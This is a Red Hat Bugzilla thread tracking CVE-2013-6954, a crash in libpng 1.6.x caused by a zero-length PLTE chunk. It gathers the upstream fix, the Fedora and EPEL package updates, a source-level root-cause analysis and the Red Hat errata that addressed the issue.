libpng 1.6.8 was released [1] and notes the following fix: Handle zero-length PLTE chunk or NULL palette with png_error() instead of png_chunk_report(), which by default issues a warning rather than an error, leading to later reading from a NULL pointer (png_ptr->palette) in png_do_expand_palette(). This is CVE-2013-6954 and VU#650142. The git commit to fix is available [3]. [1] http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/Gnupg/ [2] http://www.kb.cert.org/vuls/id/650142 [3] http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c
In Fedora we have currently libpng 1.6.8. https://bugzilla.redhat.com/show_bug.cgi?id=1033049 When the BZ for RHEL7 and older will be created than libpng will be patched.
Created mingw-libpng tracking bugs for this issue: Affects: fedora-19 [bug 1056858] Affects: fedora-20 [bug 1056859]
Created mingw32-libpng tracking bugs for this issue: Affects: epel-all [bug 1056860]
Created libpng tracking bugs for this issue: Affects: fedora-20 [bug 1056853] Affects: fedora-19 [bug 1056854]
Created libpng10 tracking bugs for this issue: Affects: fedora-all [bug 1056857] Affects: epel-6 [bug 1056861]
Created libpng12 tracking bugs for this issue: Affects: fedora-all [bug 1056856]
Created libpng15 tracking bugs for this issue: Affects: fedora-20 [bug 1056855]
Does anyone have a reproducer image for the null/empty palette issues, so I can test a fix for libpng10 (which has slightly different code)?
libpng10-1.0.60-6.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
libpng10-1.0.60-6.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
Created attachment 860584 [details] tarball with testcase Had to put the file in a tarball as firefox was trying to preview and crashing as expected.
Upstream tells me that only libpng 1.6.1 to 1.6.7 were affected by this issue. I've just tried an unpatched libpng 1.0.61 with xv, which had no problem loading the testcase image.
Based on the reproducer posted in comment #19, it seems that this issue only affects libpng-1.6. It does not affect older versions of libpng. Statement: Not Vulnerable. This issue does not affect the version of libpng as shipped with Red Hat Enterprise Linux 5 and 6.
libpng10-1.0.61-1.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.
mingw-libpng-1.6.10-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
Analysis: libgng-1.2: =========== png_set_PLTE() is called with the values num_palette=0, Later at: 454 if (num_palette < 0 || num_palette > PNG_MAX_PALETTE_LENGTH) checks the bounds of num_palette, there is no checking for num_palette=0 though. Then memory is malloced for png_ptr->palette structure at: 477 png_ptr->palette = (png_colorp)png_calloc(png_ptr, 478 PNG_MAX_PALETTE_LENGTH * png_sizeof(png_color)); This mallocs 256 * 3 bytes of memory into png_ptr->palette structure, Later at: 479 png_memcpy(png_ptr->palette, palette, num_palette * png_sizeof(png_color)); Here zero bytes are copied into png_ptr->palette because num_palette = 0, so this memcpy looks like: png_memcpy(png_ptr->palette, palette, 0) So png_ptr->palette is filled with 256 * 3 zeros, (due to calloc) Later when this structure is references in png_do_expand_palette(), the output is zero and there is no crash. libpng 1.6: =========== Here in png_set_PLTE() there is a check for num_palette = 0 at: 523 if ((num_palette > 0 && palette == NULL) || 524 (num_palette == 0 525 # ifdef PNG_MNG_FEATURES_SUPPORTED 526 && (png_ptr->mng_features_permitted & PNG_FLAG_MNG_EMPTY_PLTE) == 0 527 # endif 528 )) 529 { 530 png_chunk_report(png_ptr, "Invalid palette", PNG_CHUNK_ERROR); 531 return; 532 } So when num_palette is zero, a warning is printed and the function exits, However no memory is malloced for the png_ptr->palette structure, and its pointing to zero. Later when its referenced in png_do_expand_palette(), there is a null pointer deref and it crashes.
This issue has been addressed in following products: Oracle Java for Red Hat Enterprise Linux 6 Oracle Java for Red Hat Enterprise Linux 5 Via RHSA-2014:0413 https://rhn.redhat.com/errata/RHSA-2014-0413.html
This issue has been addressed in following products: Supplementary for Red Hat Enterprise Linux 6 Supplementary for Red Hat Enterprise Linux 5 Via RHSA-2014:0412 https://rhn.redhat.com/errata/RHSA-2014-0412.html
OpenJDK upstream commit: http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/df3f9871ee6f
This issue has been addressed in following products: Oracle Java for Red Hat Enterprise Linux 6 Oracle Java for Red Hat Enterprise Linux 5 Via RHSA-2014:0414 https://rhn.redhat.com/errata/RHSA-2014-0414.html
This issue has been addressed in following products: Supplementary for Red Hat Enterprise Linux 5 Supplementary for Red Hat Enterprise Linux 6 Via RHSA-2014:0486 https://rhn.redhat.com/errata/RHSA-2014-0486.html
This issue has been addressed in following products: Supplementary for Red Hat Enterprise Linux 5 Supplementary for Red Hat Enterprise Linux 6 Via RHSA-2014:0508 https://rhn.redhat.com/errata/RHSA-2014-0508.html
*** Bug 1106391 has been marked as a duplicate of this bug. ***
This issue has been addressed in following products: Supplementary for Red Hat Enterprise Linux 7 Via RHSA-2014:0705 https://rhn.redhat.com/errata/RHSA-2014-0705.html
This issue has been addressed in following products: Red Hat Network Satellite Server v 5.4 Red Hat Network Satellite Server v 5.5 Red Hat Satellite Server v 5.6 Via RHSA-2014:0982 https://rhn.redhat.com/errata/RHSA-2014-0982.html